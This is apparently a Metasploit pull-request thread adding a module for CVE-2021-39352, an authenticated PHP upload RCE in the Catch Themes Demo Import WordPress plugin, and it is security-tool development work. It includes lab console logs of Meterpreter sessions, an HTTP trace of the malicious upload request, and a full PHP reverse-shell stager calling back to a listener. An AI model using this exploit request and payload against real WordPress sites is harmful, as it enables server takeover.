Wordpress Plugin Catch Themes Demo Import cve-2021-39352

[h00die]

This PR adds cve-2021-39352, an authenticated wordpress plugin RCE against Catch Themes Demo Import < 1.8
Pretty simple exploit, login, grab a nonce, upload payload, execute it. have a nice day.

Looks like the plugin doesn't have a good readme file though, so the check does find a file, but not the version. This is prob fine. I think in the future it may be a good idea to implement an authenticated check_plugin_version_from_plugin_page to check form the authenticated pages. Another PR on another day.

Also went ahead and updated the wordpress themes, and plugins files.

Verification

• Install the plugin to wordpress (https://downloads.wordpress.org/plugin/catch-themes-demo-import.1.6.1.zip)
• Start msfconsole
• Do: use exploits/multi/http/wp_catch_themes_demo_import
• Do: set rhosts
• Do: set username
• Do: set password
• Do: run
• You should get a shell.
• check docs are good

[space-r7]

Code looks good to me. Added a suggestion to mention authentication as a requirement for exploitation in docs / module description.

[space-r7]

I've gotten a successful session a few times, but I'm getting a few failures as well:

msf6 > use exploit/multi/http/wp_catch_themes_demo_import
[*] Using configured payload php/meterpreter/reverse_tcp
msf6 exploit(multi/http/wp_catch_themes_demo_import) > set lhost 192.168.140.1
lhost => 192.168.140.1
msf6 exploit(multi/http/wp_catch_themes_demo_import) > set rhost 192.168.140.238
rhost => 192.168.140.238
msf6 exploit(multi/http/wp_catch_themes_demo_import) > set password password
password => password
msf6 exploit(multi/http/wp_catch_themes_demo_import) > run

[*] Started reverse TCP handler on 192.168.140.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated. Could not identify the version number
[-] Exploit aborted due to failure: unexpected-reply: Failed to upload payload
[*] Exploit completed, but no session was created.
msf6 exploit(multi/http/wp_catch_themes_demo_import) > rerun
[*] Reloading module...

[*] Started reverse TCP handler on 192.168.140.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated. Could not identify the version number
[*] Triggering payload at wp-content/uploads/2022/1/TrjxIRaZHgnN.php
[*] Sending stage (39282 bytes) to 192.168.140.238
[+] Deleted TrjxIRaZHgnN.php
[*] Meterpreter session 1 opened (192.168.140.1:4444 -> 192.168.140.238:48768 ) at 2022-01-03 14:26:39 -0600



meterpreter > getuid
Server username: www-data
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.140.238 - Meterpreter session 1 closed.  Reason: Died
msf6 exploit(multi/http/wp_catch_themes_demo_import) > rerun
[*] Reloading module...

[*] Started reverse TCP handler on 192.168.140.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated. Could not identify the version number
[-] Exploit aborted due to failure: unexpected-reply: Failed to upload payload
[*] Exploit completed, but no session was created.

Failure with HTTPTRACE output

####################
# Request:
####################
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: 192.168.140.238
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Cookie: wordpress_test_cookie=WP%20Cookie%20check; wordpress_5c016e8f0f95f039102cbe8366c5c7f3=admin%7C1641414740%7CovG0DgwKUk7OHlmsoKuS19fTZkeKBYy2gdNAx9AnAwq%7C6c118c265d0835aa02c3ded8408128e9d0e1a22083414ff7f2ed98acdcaee39b; wordpress_5c016e8f0f95f039102cbe8366c5c7f3=admin%7C1641414740%7CovG0DgwKUk7OHlmsoKuS19fTZkeKBYy2gdNAx9AnAwq%7C6c118c265d0835aa02c3ded8408128e9d0e1a22083414ff7f2ed98acdcaee39b; wordpress_logged_in_5c016e8f0f95f039102cbe8366c5c7f3=admin%7C1641414740%7CovG0DgwKUk7OHlmsoKuS19fTZkeKBYy2gdNAx9AnAwq%7C3d5e52aef19b004e3d1a4370175ae7e7563dcd05d3ddab69dd9fd6e233c20d85;
Content-Type: multipart/form-data; boundary=_Part_12_663569196_2631884551
Content-Length: 1595

--_Part_12_663569196_2631884551
Content-Disposition: form-data; name="action"

ctdi_import_demo_data
--_Part_12_663569196_2631884551
Content-Disposition: form-data; name="security"

2b7717075d
--_Part_12_663569196_2631884551
Content-Disposition: form-data; name="selected"

undefined
--_Part_12_663569196_2631884551
Content-Disposition: form-data; name="content_file"; filename="bgMJ1R82UV.php"
Content-Type: application/x-php

/*<?php /**/ error_reporting(0); $ip = '192.168.140.1'; $port = 4444; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();
--_Part_12_663569196_2631884551--

####################
# Response:
####################
HTTP/1.1 200 OK
Date: Mon, 03 Jan 2022 20:32:21 GMT
Server: Apache/2.4.41 (Ubuntu)
X-Robots-Tag: noindex
X-Content-Type-Options: nosniff
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
X-Frame-Options: SAMEORIGIN
Referrer-Policy: strict-origin-when-cross-origin
Content-Length: 31
Content-Type: application/json; charset=UTF-8

{"status":"afterAllImportAJAX"}
[-] Exploit aborted due to failure: unexpected-reply: Failed to upload payload
[*] Exploit completed, but no session was created.

Edit: It might be an issue with my setup since waiting a minute or two before retrying gives another session. Just wanted to check if you've run into this error before.

[h00die]

I didn't experience this before, but can confirm the afterAllImportAJAX thing.
https://support.shufflehound.com/forums/topic/i-cant-use-the-one-click-demo-installer/#post-31770 seems related, but being 3yrs old and 'fixed' I'm not sure if its related or not.

Being that I was able to confirm what you did, i adjusted docs and error handling to account for this

[h00die]

I don't think the rspec issues are related to this module.

[space-r7]

Thanks for the changes! I modified the print_status() call to show the full path to the payload. Will go ahead and land since the spec failures have nothing to do with this pr.

msf6 > use exploit/multi/http/wp_catch_themes_demo_import
[*] Using configured payload php/meterpreter/reverse_tcp
msf6 exploit(multi/http/wp_catch_themes_demo_import) > set rhost 192.168.140.238
rhost => 192.168.140.238
msf6 exploit(multi/http/wp_catch_themes_demo_import) > set lhost 192.168.140.1
lhost => 192.168.140.1
msf6 exploit(multi/http/wp_catch_themes_demo_import) > set password password
password => password
msf6 exploit(multi/http/wp_catch_themes_demo_import) > run

[*] Started reverse TCP handler on 192.168.140.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated. Could not identify the version number
[*] Triggering payload at wp-content/uploads/2022/01/BC9gSc7X.php
[*] Sending stage (39282 bytes) to 192.168.140.238
[+] Deleted BC9gSc7X.php
[*] Meterpreter session 1 opened (192.168.140.1:4444 -> 192.168.140.238:50112 ) at 2022-01-04 14:37:37 -0600

meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer    : ubuntu
OS          : Linux ubuntu 5.11.0-43-generic #47~20.04.2-Ubuntu SMP Mon Dec 13 11:06:56 UTC 2021 x86_64
Meterpreter : php/linux
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.140.238 - Meterpreter session 1 closed.  Reason: User exit
msf6 exploit(multi/http/wp_catch_themes_demo_import) > run

[*] Started reverse TCP handler on 192.168.140.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated. Could not identify the version number
[-] Exploit aborted due to failure: unexpected-reply: Plugin not ready to process new payloads. Please retry in a few minutes.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/http/wp_catch_themes_demo_import) >

[space-r7]

Release Notes

This adds an exploit for the Catch Themes Demo Import Wordpress plugin for versions below 1.8. The functionality for importing a theme does not properly sanitize file formats, allowing an authenticated user to upload a php payload. Requesting the uploaded file achieves code execution as the user running the web server.